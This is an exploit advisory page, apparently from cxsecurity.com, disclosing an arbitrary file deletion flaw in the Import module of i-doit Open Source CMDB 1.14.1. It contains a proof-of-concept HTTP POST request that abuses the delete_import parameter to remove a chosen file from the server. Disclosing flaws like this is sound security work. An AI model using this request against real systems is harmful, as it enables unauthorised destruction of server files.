i-doit Open Source CMDB 1.14.1 Arbitrary File Deletion

2020.05.08
Credit: Besim ALTINOK
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion # Date: 2020-05-02 # Author: Besim ALTINOK # Vendor Homepage: https://www.i-doit.org/ # Software Link: https://sourceforge.net/projects/i-doit/ # Version: v1.14.1 # Tested on: Xampp # Credit: İsmail BOZKURT -------------------------------------------------------------------------------------------------- Vulnerable Module ---> Import Module Vulnerable parameter ---> delete_import ----------- PoC ----------- POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ****************************** Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7.3 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-i-doit-Tenant-Id: 1 Content-Length: 30 DNT: 1 Connection: close Cookie: PHPSESSID=bf21********************************68b8 delete_import=Type the filename, you want to delete from the server here


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top